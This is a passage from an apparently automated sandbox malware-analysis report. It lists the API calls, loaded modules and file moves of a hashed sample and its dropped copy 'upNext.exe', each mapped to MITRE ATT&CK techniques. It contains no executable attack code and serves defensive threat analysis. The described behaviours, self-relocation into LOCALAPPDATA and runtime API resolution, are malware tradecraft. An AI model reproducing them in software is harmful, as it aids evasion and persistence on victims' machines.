with a parameter GetFullPathNameA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetExitCodeThread (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetDateFormatA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentDirectoryA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FormatMessageA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindResourceA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindNextFileA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FileTimeToDosDateTime (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VerQueryValueA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter wvsprintfA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter UnregisterClassA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetWindowTextA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegisterClassA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter PostMessageA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter PeekMessageA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetWindowTextA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetWindowLongA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetMessageA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetClassNameA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetClassInfoA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindWindowA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DispatchMessageA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WSACleanup (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter gethostname (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter gethostbyname (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter socket (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter select (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter inet_ntoa (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter inet_addr (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter htons (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter connect (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindNextUrlCacheEntryA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindFirstUrlCacheEntryA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DefWindowProcA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateWindowExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetWindowLongA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoAddRefServerProcess (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoReleaseServerProcess (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoResumeClassObjects (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoSuspendClassObjects (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleIconToCursor (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreateFontIndirect (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreatePictureIndirect (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleLoadPicture (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleTranslateColor (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrame (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrameIndirect (UID: 00000000-00002104)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002104)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e796a@advapi32.dll\"\n \"0e000f00703f796a@advapi32.dll\"\n \"0e000f00cc3f796a@advapi32.dll\"\n \"11001200b447796a@advapi32.dll\"\n \"110012004848796a@advapi32.dll\"\n \"120013008c48796a@advapi32.dll\"\n \"12001300e448796a@advapi32.dll\"\n \"14001500386e796a@advapi32.dll\"\n \"14001500506e796a@advapi32.dll\"\n \"14001500686e796a@advapi32.dll\"\n \"17001800806e796a@advapi32.dll\"\n \"0d000e00986e796a@advapi32.dll\"\n \"11001200a86e796a@advapi32.dll\"\n \"11001200bc6e796a@advapi32.dll\"\n \"0f001000fc6f796a@advapi32.dll\"\n \"140015003c70796a@advapi32.dll\"\n \"140015005470796a@advapi32.dll\"\n \"0c000d009c70796a@advapi32.dll\"\n \"0c000d00ac70796a@advapi32.dll\"\n \"0e000f00bc70796a@advapi32.dll\"\n \"0e000f00cc70796a@advapi32.dll\"\n \"0b000c00dc70796a@advapi32.dll\"\n \"180019001473796a@RPCRT4.dll\"\n \"130014004073796a@RPCRT4.dll\"\n \"140015005473796a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-224", "type": 6, "relevance": 1, "name": "Calls an API typically used to move file or directory", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"MoveFileA\" with parameter C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe & C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.del (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"MoveFileA\" with parameter C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.tmp & C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe (UID: 00000000-00006072)\n \"upNext.exe\" called \"MoveFileA\" with parameter %LOCALAPPDATA%\\upNext.exe & %LOCALAPPDATA%\\upNext.del (UID: 00000000-00002104)\n \"upNext.exe\" called \"MoveFileA\" with parameter %LOCALAPPDATA%\\upNext.tmp & %LOCALAPPDATA%\\upNext.exe (UID: 00000000-00002104)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 736d0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"KERNEL32\" at base 75d10000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a7f0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"KERNEL32.DLL\" at base 75d10000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"USER32.DLL\" at base 77720000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"ADVAPI32.DLL\" at base 75ab0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"VERSION.DLL\" at base 74c10000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"WSOCK32.DLL\" at base 736c0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 757f0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"WININET.DLL\" at base 766a0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"SHFOLDER.DLL\" at base 6c500000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"OLE32.DLL\" at base 75b60000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74450000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"DWMAPI.DLL\" at base 73fd0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"OLEPRO32.DLL\" at base 6a730000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75140000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74ca0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 739a0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73e20000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76140000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"RPCRT4.DLL\" at base 75df0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73e00000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"DNSAPI.DLL\" at base 75000000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73df0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"WS2_32.DLL\" at base 75cc0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"IPHLPAPI.DLL\" at base 737d0000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71790000\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" loaded module \"RASADHLP.DLL\" at base 6d2f0000\n \"upNext.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 736d0000\n \"upNext.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"upNext.exe\" loaded module \"KERNEL32\" at base 75d10000\n \"upNext.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"upNext.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a7f0000\n \"upNext.exe\" loaded module \"KERNEL32.DLL\" at base 75d10000\n \"upNext.exe\" loaded module \"USER32.DLL\" at base 77720000\n \"upNext.exe\" loaded module \"ADVAPI32.DLL\" at base 75ab0000\n \"upNext.exe\" loaded module \"VERSION.DLL\" at base 74c10000\n \"upNext.exe\" loaded module \"WSOCK32.DLL\" at base 736c0000\n \"upNext.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 757f0000\n \"upNext.exe\" loaded module \"WININET.DLL\" at base 766a0000\n \"upNext.exe\" loaded module \"SHFOLDER.DLL\" at base 6c260000\n \"upNext.exe\" loaded module \"OLE32.DLL\" at base 75b60000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74450000\n \"upNext.exe\" loaded module \"DWMAPI.DLL\" at base 73fd0000\n \"upNext.exe\" loaded module \"OLEPRO32.DLL\" at base 6a790000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75140000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74ca0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 739a0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 73e20000\n \"upNext.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76140000\n \"upNext.exe\" loaded module \"RPCRT4.DLL\" at base 75df0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 73e00000\n \"upNext.exe\" loaded module \"DNSAPI.DLL\" at base 75000000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 73df0000\n \"upNext.exe\" loaded module \"WS2_32.DLL\" at base 75cc0000\n \"upNext.exe\" loaded module \"IPHLPAPI.DLL\" at base 737d0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 71790000\n \"upNext.exe\" loaded module \"RASADHLP.DLL\" at base 6d2f0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter wsock32.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter SHFolder.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.ENU (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter C:\\0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.EN (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter olepro32.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00006072)\n \"0fdecbaeb68d2b916735ad041c7b568d88941926d04a39acf34ed98e0305ea1a.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006072)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter wsock32.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter SHFolder.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter %LOCALAPPDATA%\\upNext.ENU (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter %LOCALAPPDATA%\\upNext.EN (UID: 00000000-00002104)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 